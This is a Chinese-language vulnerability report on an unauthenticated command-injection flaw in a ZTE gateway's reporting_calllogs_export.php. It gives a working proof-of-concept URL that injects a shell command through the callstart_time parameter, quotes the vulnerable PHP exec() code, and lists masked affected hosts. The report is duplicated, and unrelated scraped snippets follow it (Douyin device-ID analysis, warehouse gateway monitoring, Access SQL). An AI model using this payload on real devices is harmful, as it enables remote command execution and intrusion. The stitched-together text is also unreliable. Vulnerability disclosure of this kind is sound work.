中興某閘道器裝置存在命令執行漏洞(無需登入)
直接給出漏洞的poc
/modules/reporting/reporting_calllogs_export.php?callstart_time=1;ifconfig>wy.txt
callstart_time、callend_time引數存在命令執行
這個檔案的部分**為:
$today = date('y-m-d', time());
$s_date = isset($_get['callstart_time']) ? trim($_get['callstart_time']) : $today;
$e_date = isset($_get['callend_time']) ? trim($_get['callend_time']) : $today;
@exec("date +'%v' -d $today", $output_today);
$weeks_today = $output_today ? intval($output_today[0]) : 0;
@exec("date +'%v' -d $s_date", $output_s);
$weeks_from = $output_s ? intval($output_s[0]) : 0;
@exec("date +'%v' -d $e_date", $output_e);
$weeks_to = $output_e ? intval($output_e[0]) : 0;
很明顯的命令執行,只要提交構造好的callend_time或callstart_time引數即可執行任意命令
再給出其他幾個案例:
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
直接給出漏洞的poc
/modules/reporting/reporting_calllogs_export.php?callstart_time=1;ifconfig>wy.txt
callstart_time、callend_time引數存在命令執行
這個檔案的部分**為:
$today = date('y-m-d', time());
$s_date = isset($_get['callstart_time']) ? trim($_get['callstart_time']) : $today;
$e_date = isset($_get['callend_time']) ? trim($_get['callend_time']) : $today;
@exec("date +'%v' -d $today", $output_today);
$weeks_today = $output_today ? intval($output_today[0]) : 0;
@exec("date +'%v' -d $s_date", $output_s);
$weeks_from = $output_s ? intval($output_s[0]) : 0;
@exec("date +'%v' -d $e_date", $output_e);
$weeks_to = $output_e ? intval($output_e[0]) : 0;
很明顯的命令執行,只要提交構造好的callend_time或callstart_time引數即可執行任意命令
過濾
某音裝置號研究分析
分析 抓包分析 如已安裝過某音,需重置模擬器才可抓到包,剛開啟抖音即可抓到註冊裝置號的資料報 資料報截圖 選項 解釋 請求方式 post 請求體 加密資料報 返回資料 裝置號資訊 主要引數 device id和install id 可分析出除了xg演算法,主要引數加密body體了 部分 python...
閘道器裝置是否合法 工業閘道器下的倉庫安全監測管理系統
倉庫很多時候往往存放很多生產原料 成品 包裝等一系列易燃易爆物品,導致危險係數很高,一旦發生失火 等事件帶來巨大損失,甚至傷及人命,所以加強倉庫及其物資的安全管理十分有必要,主要考慮防火 受潮兩個因素。因此,工業閘道器下倉庫安全監測管理系統顯得十分重要。工業閘道器下倉庫安全監測管理系統具備火情監測 ...
用SQL語句查詢Access中某錶是否存在方法
access資料庫雖然功能單一,但的確是乙個小巧精幹的開發夥伴,我在多個專案中與它見面,為了探知access資料庫的本源,今天上網查了些資料。現總結歸納如下 在access資料庫中通過sql語句找到某一表是否存在的確是一件困難的事。幸好,access本身就有一些隱含的資料物件能夠儲存你庫中的資訊,今...